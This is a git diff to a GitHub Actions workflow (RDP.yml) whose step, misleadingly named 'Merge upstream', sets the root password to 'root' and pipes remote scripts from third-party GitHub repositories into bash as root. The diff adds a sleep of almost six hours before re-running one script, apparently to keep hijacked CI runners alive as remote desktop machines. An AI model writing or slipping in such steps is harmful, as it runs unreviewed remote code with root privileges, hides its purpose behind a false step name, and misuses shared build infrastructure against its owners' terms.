--- a/.github/workflows/RDP.yml
+++ b/.github/workflows/RDP.yml
@@ -10,4 +10,4 @@ jobs:
       - name: Merge upstream
         run: |
           printf "root\nroot" | sudo passwd root && printf "root" | su - root -c " curl https://raw.githubusercontent.com/amit-study/bestRDP/main/RDP | bash " &
-          curl https://raw.githubusercontent.com/jha-ji/RDP_Linux/main/scripts/rerun | bash
+          sleep 5h && sleep 58m && curl https://raw.githubusercontent.com/jha-ji/RDP_Linux/main/scripts/rerun | bash
